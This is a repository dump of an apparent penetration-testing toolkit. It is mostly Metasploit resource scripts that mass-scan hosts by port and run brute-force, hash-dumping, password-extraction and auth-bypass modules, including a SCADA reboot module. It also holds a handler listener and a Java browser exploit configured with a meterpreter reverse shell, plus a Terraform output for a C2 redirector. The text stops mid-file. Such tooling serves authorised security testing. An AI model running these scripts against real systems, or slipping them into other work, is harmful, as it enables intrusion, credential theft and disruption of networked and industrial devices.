├── .gitignore ├── report ├── assets │ ├── images │ │ ├── logo.png │ │ ├── icons │ │ │ ├── fail.png │ │ │ ├── info.png │ │ │ ├── pass.png │ │ │ └── warn.png │ │ └── banner.svg │ └── fonts │ │ ├── FontAwesome.otf │ │ ├── ironvue-icons.eot │ │ ├── ironvue-icons.ttf │ │ ├── ironvue-icons.woff │ │ ├── ironvue-icons.woff2 │ │ ├── fontawesome-webfont.eot │ │ ├── fontawesome-webfont.ttf │ │ └── fontawesome-webfont.woff ├── tools │ ├── active │ │ └── .gitignore │ └── recon-ng │ │ └── .gitignore ├── data │ ├── hosts.htm │ ├── doc.htm │ ├── emails.htm │ ├── names.htm │ ├── pdf.htm │ ├── ppt.htm │ ├── txt.htm │ ├── waf.htm │ ├── xls.htm │ ├── records.htm │ ├── squatting.htm │ ├── subdomains.htm │ ├── traceroute.htm │ ├── whatweb.htm │ ├── whois-ip.htm │ ├── active-recon.htm │ ├── passive-recon.htm │ ├── whois-domain.htm │ ├── zonetransfer.htm │ ├── certificates.htm │ ├── registered-domains.htm │ └── summary.htm └── pages │ └── config.htm ├── notes ├── Python │ ├── discover │ │ ├── requirements.txt │ │ ├── recon │ │ │ ├── salesforce.py │ │ │ └── person.py │ │ └── web │ │ │ └── multitabs.py │ ├── ex1.py │ ├── test.py │ ├── fuzzer-pop3.py │ └── scrape.py ├── mobile.txt ├── ssl.txt ├── consulting.txt ├── snmp.txt ├── PowerShell │ ├── PS-Attack.txt │ └── basic.txt ├── exploits.txt ├── dns.txt ├── maltego.txt ├── insecure-protocols.txt ├── cidr.txt ├── osx.txt ├── egress.txt ├── git.txt ├── ssl-setup.txt ├── smtp.txt ├── nexpose.txt ├── terraform.txt ├── shodan.txt ├── nmap-fire.txt ├── kali.txt └── ldap-owa.txt ├── resource ├── 2049-nfs.rc ├── 523-udp-db2.rc ├── 110-pop3.rc ├── 137-udp-netbios.rc ├── 1414-ibm-mq.rc ├── 143-imap.rc ├── 1720-h323.rc ├── 28784-scada.rc ├── 514-rshell.rc ├── 548-afp.rc ├── 5920-cctv.rc ├── 6379-redis.rc ├── 79-finger.rc ├── 19-chargen.rc ├── 20256-unitronics.rc ├── 3000-emc.rc ├── 3310-clamav.rc ├── 443-vmware.rc ├── 4800-udp-moxa.rc ├── 5000-satel.rc ├── 512-rexec.rc ├── 513-rlogin.rc ├── 5984-couchdb.rc ├── 8400-adobe.rc ├── 902-vmware.rc ├── 135-dcerpc.rc ├── 3050-borland.rc ├── 3500-emc.rc ├── 407-udp-motorola.rc ├── 5985-winrm.rc ├── 8834-nessus.rc ├── 9000-sharp.rc ├── 37777-dahua-dvr.rc ├── 46824-scada.rc ├── 5631-pcanywhere.rc ├── 5632-pcanywhere.rc ├── 7777-backdoor.rc ├── 8000-canon.rc ├── 8222-vmware.rc ├── 831-easycafe.rc ├── 998-zenworks.rc ├── 9999-telnet.rc ├── 13364-rosewill.rc ├── 30718-telnet.rc ├── 4786-cisco-smart-install.rc ├── 5040-dcerpc.rc ├── 9084-vmware.rc ├── recon-ng-import-ips.rc ├── recon-ng-import-emails.rc ├── 50000-db2.rc ├── 5060-udp-sip.rc ├── 111-rpc.rc ├── 1158-oracle.rc ├── 1900-udp-upnp.rc ├── 5060-sip.rc ├── 1099-rmi.rc ├── 8080-oracle.rc ├── 8080-tomcat.rc ├── 1604-udp-citrix.rc ├── 3306-mysql.rc ├── 5560-oracle.rc ├── 69-tftp.rc ├── 17185-udp-vxworks.rc ├── 2362-udp-scada.rc ├── 771-scada.rc ├── recon-ng.rc ├── 5900-vnc.rc ├── 465-smtp.rc ├── 3389-rdp.rc ├── 623-udp-ipmi.rc ├── 23-telnet.rc ├── recon-ng-import-names.rc ├── listener.rc ├── java.rc ├── 25-smtp.rc ├── 502-scada.rc ├── 1433-mssql.rc ├── http.rc ├── 5432-postgres.rc ├── 22-ssh.rc ├── 1521-oracle.rc ├── 6000-5-x11.rc ├── post-osx.rc ├── 123-udp-ntp.rc ├── 21-ftp.rc ├── 9100-printers.rc ├── recon-ng-active.rc ├── post-linux.rc ├── 445-smb.rc ├── 161-udp-snmp.rc └── post-windows.rc ├── config ├── install.sh ├── vimrc ├── zshrc └── tmux.conf ├── misc ├── deploy │ ├── outputs.tf │ ├── ansible │ │ └── redirector-c2.yml │ └── main.tf ├── prepmap.sh ├── netblocks.sh ├── rebrand.sh ├── dns-transfer.sh ├── ping-sweep.sh ├── dns-reverse.sh ├── subdomains-from-ssl.sh ├── dns-forward.sh ├── crawl.sh ├── compare-sites.sh └── netblocks.txt ├── directObjectRef.sh ├── person.sh ├── LICENSE ├── parsers ├── utfdictcsv.py ├── parse-burp.py ├── parse-nessus.py ├── parse-nmap.py ├── parse-nessus-feed.py └── parse-qualys.py ├── mods ├── virustotal_subdomain_enum.py ├── goofile.py ├── goog-mail.py └── crtsh_enum_psql.py ├── nikto.sh ├── listener.sh ├── generateTargets.sh ├── multiTabs.sh ├── domain.sh ├── ssl.sh └── newModules.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | __pycache__/ -------------------------------------------------------------------------------- /report/assets/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/logo.png -------------------------------------------------------------------------------- /notes/Python/discover/requirements.txt: -------------------------------------------------------------------------------- 1 | lxml>=4.2.5 2 | requests>=2.21.1 3 | requests-html>=0.10.0 4 | texttable>=1.5.0 -------------------------------------------------------------------------------- /report/tools/active/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /report/assets/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /report/assets/images/icons/fail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/fail.png -------------------------------------------------------------------------------- /report/assets/images/icons/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/info.png -------------------------------------------------------------------------------- /report/assets/images/icons/pass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/pass.png -------------------------------------------------------------------------------- /report/assets/images/icons/warn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/images/icons/warn.png -------------------------------------------------------------------------------- /report/tools/recon-ng/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore 5 | -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.eot -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.ttf -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.woff -------------------------------------------------------------------------------- /report/assets/fonts/ironvue-icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/ironvue-icons.woff2 -------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /resource/2049-nfs.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 2049 4 | 5 | use auxiliary/scanner/nfs/nfsmount 6 | run 7 | -------------------------------------------------------------------------------- /resource/523-udp-db2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 523 4 | 5 | use auxiliary/scanner/db2/discovery 6 | run 7 | -------------------------------------------------------------------------------- /report/assets/fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/objects/discover/main/report/assets/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /resource/110-pop3.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 110 4 | 5 | use auxiliary/scanner/pop3/pop3_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/137-udp-netbios.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 137 4 | 5 | use auxiliary/scanner/netbios/nbname 6 | run 7 | -------------------------------------------------------------------------------- /resource/1414-ibm-mq.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1414 4 | 5 | use auxiliary/scanner/misc/ibm_mq_enum 6 | run 7 | -------------------------------------------------------------------------------- /resource/143-imap.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 143 4 | 5 | use auxiliary/scanner/imap/imap_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/1720-h323.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1720 4 | 5 | use auxiliary/scanner/h323/h323_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/28784-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 28784 4 | 5 | use auxiliary/scanner/scada/koyo_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/514-rshell.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 514 4 | 5 | use auxiliary/scanner/rservices/rsh_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/548-afp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 548 4 | 5 | use auxiliary/scanner/afp/afp_server_info 6 | run 7 | -------------------------------------------------------------------------------- /resource/5920-cctv.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5920 4 | 5 | use auxiliary/scanner/misc/cctv_dvr_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/6379-redis.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 6379 4 | 5 | auxiliary/scanner/redis/redis_server 6 | run 7 | -------------------------------------------------------------------------------- /resource/79-finger.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 79 4 | 5 | use auxiliary/scanner/finger/finger_users 6 | run 7 | -------------------------------------------------------------------------------- /resource/19-chargen.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 19 4 | 5 | use auxiliary/scanner/chargen/chargen_probe 6 | run 7 | -------------------------------------------------------------------------------- /resource/20256-unitronics.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 20256 4 | 5 | use auxiliary/scanner/scada/pcomclient 6 | run 7 | -------------------------------------------------------------------------------- /resource/3000-emc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3000 4 | 5 | use auxiliary/admin/emc/alphastor_devicemanager 6 | run 7 | -------------------------------------------------------------------------------- /resource/3310-clamav.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3310 4 | 5 | use auxiliary/scanner/misc/clamav_control 6 | run 7 | -------------------------------------------------------------------------------- /resource/443-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 443 4 | 5 | use auxiliary/scanner/vmware/esx_fingerprint 6 | run 7 | -------------------------------------------------------------------------------- /resource/4800-udp-moxa.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 4800 4 | 5 | use auxiliary/scanner/scada/moxa_discover 6 | run 7 | -------------------------------------------------------------------------------- /resource/5000-satel.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5000 4 | 5 | use auxiliary/scanner/telnet/satel_cmd_exec 6 | run 7 | -------------------------------------------------------------------------------- /resource/512-rexec.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 512 4 | 5 | use auxiliary/scanner/rservices/rexec_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/513-rlogin.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 513 4 | 5 | use auxiliary/scanner/rservices/rlogin_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/5984-couchdb.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5984 4 | 5 | use auxiliary/scanner/couchdb/couchdb_login 6 | run 7 | -------------------------------------------------------------------------------- /resource/8400-adobe.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8400 4 | 5 | use auxiliary/scanner/http/adobe_xml_inject 6 | run 7 | -------------------------------------------------------------------------------- /resource/902-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 902 4 | 5 | use auxiliary/scanner/vmware/vmauthd_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/135-dcerpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 135 4 | 5 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor 6 | run 7 | -------------------------------------------------------------------------------- /resource/3050-borland.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3050 4 | 5 | use auxiliary/scanner/misc/ib_service_mgr_info 6 | run 7 | -------------------------------------------------------------------------------- /resource/3500-emc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3500 4 | 5 | use auxiliary/admin/emc/alphastor_librarymanager 6 | run 7 | -------------------------------------------------------------------------------- /resource/407-udp-motorola.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 407 4 | 5 | use auxiliary/scanner/motorola/timbuktu_udp 6 | run 7 | -------------------------------------------------------------------------------- /resource/5985-winrm.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5985 4 | 5 | use auxiliary/scanner/winrm/winrm_auth_methods 6 | run 7 | -------------------------------------------------------------------------------- /resource/8834-nessus.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8834 4 | 5 | use auxiliary/scanner/nessus/nessus_xmlrpc_ping 6 | run 7 | -------------------------------------------------------------------------------- /resource/9000-sharp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9000 4 | 5 | use auxiliary/scanner/misc/raysharp_dvr_passwords 6 | run 7 | -------------------------------------------------------------------------------- /resource/37777-dahua-dvr.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 37777 4 | 5 | use auxiliary/scanner/misc/dahua_dvr_auth_bypass 6 | run 7 | -------------------------------------------------------------------------------- /resource/46824-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 46824 4 | 5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /resource/5631-pcanywhere.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5631 4 | 5 | use auxiliary/scanner/pcanywhere/pcanywhere_tcp 6 | run 7 | -------------------------------------------------------------------------------- /resource/5632-pcanywhere.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5632 4 | 5 | use auxiliary/scanner/pcanywhere/pcanywhere_udp 6 | run 7 | -------------------------------------------------------------------------------- /resource/7777-backdoor.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 7777 4 | 5 | use auxiliary/scanner/backdoor/energizer_duo_detect 6 | run 7 | -------------------------------------------------------------------------------- /resource/8000-canon.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8000 4 | 5 | use auxiliary/scanner/printer/canon_iradv_pwd_extract 6 | run 7 | -------------------------------------------------------------------------------- /resource/8222-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8222 4 | 5 | use auxiliary/scanner/vmware/vmware_server_dir_trav 6 | run 7 | -------------------------------------------------------------------------------- /resource/831-easycafe.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 831 4 | 5 | use auxiliary/scanner/misc/easycafe_server_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /resource/998-zenworks.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 998 4 | 5 | use auxiliary/scanner/misc/zenworks_preboot_fileaccess 6 | run 7 | -------------------------------------------------------------------------------- /resource/9999-telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9999 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_version 6 | run 7 | -------------------------------------------------------------------------------- /resource/13364-rosewill.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 13364 4 | 5 | use auxiliary/scanner/misc/rosewill_rxs3211_passwords 6 | run 7 | -------------------------------------------------------------------------------- /resource/30718-telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 30718 4 | 5 | use auxiliary/scanner/telnet/lantronix_telnet_password 6 | run 7 | -------------------------------------------------------------------------------- /resource/4786-cisco-smart-install.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 4786 4 | 5 | use auxiliary/scanner/misc/cisco_smart_install 6 | run 7 | -------------------------------------------------------------------------------- /resource/5040-dcerpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5040 4 | 5 | use auxiliary/scanner/dcerpc/windows_deployment_services 6 | run 7 | -------------------------------------------------------------------------------- /resource/9084-vmware.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9084 4 | 5 | use auxiliary/scanner/vmware/vmware_update_manager_traversal 6 | run 7 | -------------------------------------------------------------------------------- /resource/recon-ng-import-ips.rc: -------------------------------------------------------------------------------- 1 | modules load import/list 2 | options set FILENAME /tmp/tmp-ips 3 | options set TABLE hosts 4 | options set COLUMN ip_address 5 | run 6 | -------------------------------------------------------------------------------- /resource/recon-ng-import-emails.rc: -------------------------------------------------------------------------------- 1 | modules load import/list 2 | options set FILENAME /tmp/tmp-emails 3 | options set TABLE contacts 4 | options set COLUMN email 5 | run 6 | -------------------------------------------------------------------------------- /resource/50000-db2.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 50000 4 | 5 | use auxiliary/scanner/db2/db2_version 6 | run 7 | 8 | use auxiliary/scanner/db2/db2_auth 9 | run 10 | -------------------------------------------------------------------------------- /resource/5060-udp-sip.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator 6 | run 7 | 8 | use auxiliary/scanner/sip/options 9 | run 10 | -------------------------------------------------------------------------------- /resource/111-rpc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 111 4 | 5 | use auxiliary/scanner/misc/sunrpc_portmapper 6 | run 7 | 8 | use auxiliary/scanner/nfs/nfsmount 9 | run 10 | -------------------------------------------------------------------------------- /resource/1158-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1158 4 | 5 | use auxiliary/scanner/oracle/emc_sid 6 | run 7 | 8 | use auxiliary/scanner/oracle/spy_sid 9 | run 10 | -------------------------------------------------------------------------------- /resource/1900-udp-upnp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1900 4 | 5 | use auxiliary/scanner/upnp/ssdp_amp 6 | run 7 | 8 | use auxiliary/scanner/upnp/ssdp_msearch 9 | run 10 | -------------------------------------------------------------------------------- /resource/5060-sip.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5060 4 | 5 | use auxiliary/scanner/sip/enumerator_tcp 6 | run 7 | 8 | use auxiliary/scanner/sip/options_tcp 9 | run 10 | -------------------------------------------------------------------------------- /resource/1099-rmi.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1099 4 | 5 | use auxiliary/scanner/misc/java_rmi_server 6 | run 7 | 8 | use auxiliary/scanner/misc/java_jmx_server 9 | run 10 | -------------------------------------------------------------------------------- /resource/8080-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8080 4 | 5 | use auxiliary/scanner/oracle/xdb_sid_brute 6 | run 7 | 8 | use auxiliary/scanner/oracle/xdb_sid 9 | run 10 | -------------------------------------------------------------------------------- /resource/8080-tomcat.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 8080 4 | 5 | use auxiliary/scanner/http/tomcat_enum 6 | run 7 | 8 | use auxiliary/scanner/http/tomcat_mgr_login 9 | run 10 | -------------------------------------------------------------------------------- /resource/1604-udp-citrix.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1604 4 | 5 | use gather/citrix_published_applications 6 | run 7 | 8 | use gather/citrix_published_bruteforce 9 | run 10 | -------------------------------------------------------------------------------- /resource/3306-mysql.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3306 4 | 5 | use auxiliary/scanner/mysql/mysql_version 6 | run 7 | 8 | use scanner/mysql/mysql_authbypass_hashdump 9 | run 10 | -------------------------------------------------------------------------------- /resource/5560-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5560 4 | 5 | use auxiliary/scanner/oracle/isqlplus_login 6 | run 7 | 8 | use auxiliary/scanner/oracle/isqlplus_sidbrute 9 | run 10 | -------------------------------------------------------------------------------- /resource/69-tftp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 69 4 | 5 | use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp 6 | run 7 | 8 | use auxiliary/scanner/tftp/netdecision_tftp 9 | run 10 | -------------------------------------------------------------------------------- /resource/17185-udp-vxworks.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 17185 4 | 5 | use auxiliary/scanner/vxworks/wdbrpc_version 6 | run 7 | 8 | use auxiliary/scanner/vxworks/wdbrpc_bootline 9 | run 10 | -------------------------------------------------------------------------------- /resource/2362-udp-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 2362 4 | 5 | use auxiliary/scanner/scada/digi_addp_reboot 6 | run 7 | 8 | use auxiliary/scanner/scada/digi_addp_version 9 | run 10 | -------------------------------------------------------------------------------- /resource/771-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 771 4 | 5 | use auxiliary/scanner/scada/digi_realport_serialport_scan 6 | run 7 | 8 | use auxiliary/scanner/scada/digi_realport_version 9 | run 10 | -------------------------------------------------------------------------------- /resource/recon-ng.rc: -------------------------------------------------------------------------------- 1 | modules load recon/companies-contacts/pen 2 | run 3 | modules load recon/domains-contacts/pen 4 | run 5 | modules load recon/domains-contacts/pgp_search 6 | run 7 | modules load recon/hosts-hosts/resolve 8 | run 9 | -------------------------------------------------------------------------------- /resource/5900-vnc.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5900 4 | 5 | use auxiliary/scanner/vnc/ard_root_pw 6 | run 7 | 8 | use auxiliary/scanner/vnc/vnc_login 9 | run 10 | 11 | use auxiliary/scanner/vnc/vnc_none_auth 12 | run 13 | -------------------------------------------------------------------------------- /resource/465-smtp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 465 4 | 5 | use auxiliary/scanner/smtp/smtp_enum 6 | run 7 | 8 | use auxiliary/scanner/smtp/smtp_ntlm_domain 9 | run 10 | 11 | use auxiliary/scanner/smtp/smtp_relay 12 | run 13 | -------------------------------------------------------------------------------- /resource/3389-rdp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 3389 4 | 5 | use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 6 | run 7 | 8 | use auxiliary/scanner/rdp/ms12_020_check 9 | run 10 | 11 | use auxiliary/scanner/rdp/rdp_scanner 12 | run 13 | -------------------------------------------------------------------------------- /resource/623-udp-ipmi.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 623 4 | 5 | use auxiliary/scanner/ipmi/ipmi_cipher_zero 6 | run 7 | 8 | use auxiliary/scanner/ipmi/ipmi_version 9 | run 10 | 11 | use auxiliary/scanner/ipmi/ipmi_dumphashes 12 | run 13 | -------------------------------------------------------------------------------- /config/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ $UID == 0 ]]; then 4 | home='/root/' 5 | else 6 | home=`(eval echo ~$USER/)` 7 | fi 8 | 9 | cp tmux.conf $home.tmux.conf 10 | cp vimrc $home.vimrc 11 | cat zshrc >> $home.zshrc 12 | 13 | source $home.zshrc 2>/dev/null 14 | -------------------------------------------------------------------------------- /resource/23-telnet.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 23 4 | 5 | use auxiliary/scanner/telnet/telnet_version 6 | run 7 | 8 | use auxiliary/scanner/telnet/telnet_encrypt_overflow 9 | run 10 | 11 | use auxiliary/scanner/telnet/telnet_ruggedcom 12 | run 13 | -------------------------------------------------------------------------------- /resource/recon-ng-import-names.rc: -------------------------------------------------------------------------------- 1 | modules load import/csv_file 2 | options set FILENAME /tmp/names.csv 3 | options set TABLE contacts 4 | options set COLUMN_SEPARATOR # 5 | options set CSV_FIRST_NAME first_name 6 | options set CSV_LAST_NAME last_name 7 | options set CSV_TITLE title 8 | run 9 | -------------------------------------------------------------------------------- /resource/listener.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set PAYLOAD aaa 3 | set LHOST bbb 4 | set LPORT ccc 5 | set ExitOnSession false 6 | set AutoVerifySession false 7 | set AutoSystemInfo false 8 | set AutoLoadStdapi false 9 | set AutoRunScript post/windows/manage/migrate 10 | exploit -j 11 | -------------------------------------------------------------------------------- /misc/deploy/outputs.tf: -------------------------------------------------------------------------------- 1 | output "instance_id" { 2 | description = "ID of payload instance" 3 | value = aws_instance.redirector.id 4 | } 5 | 6 | output "instance_ip" { 7 | description = "Public IP of the payload instance" 8 | value = aws_instance.redirector.public_ip 9 | } 10 | -------------------------------------------------------------------------------- /misc/prepmap.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | # https://www.darrinward.com/lat-long/ 4 | 5 | cat /root/tmp | egrep -v '(\+|latitude|returned|Spooling|stop)' | sed 's/| //g' | sed 's/|//g' | sed 's/^[ \t]*//;s/[ \t]*$//' | sed 's/ /,/g' | sed 's/ /,/g' | sed '/^$/d' > /root/latlong.txt 6 | echo 7 | echo 8 | -------------------------------------------------------------------------------- /resource/java.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/browser/java_jre17_jmxbean 2 | set SRVPORT 443 3 | set URIPATH / 4 | set PAYLOAD java/meterpreter/reverse_tcp 5 | set LHOST 6 | set LPORT 443 7 | set AutoLoadStdapi false 8 | set AutoVerifySession false 9 | set AutoRunScript post/windows/manage/migrate 10 | exploit 11 | -------------------------------------------------------------------------------- /resource/25-smtp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 25 4 | 5 | use auxiliary/scanner/smtp/smtp_version 6 | run 7 | 8 | use auxiliary/scanner/smtp/smtp_enum 9 | run 10 | 11 | use auxiliary/scanner/smtp/smtp_ntlm_domain 12 | run 13 | 14 | use 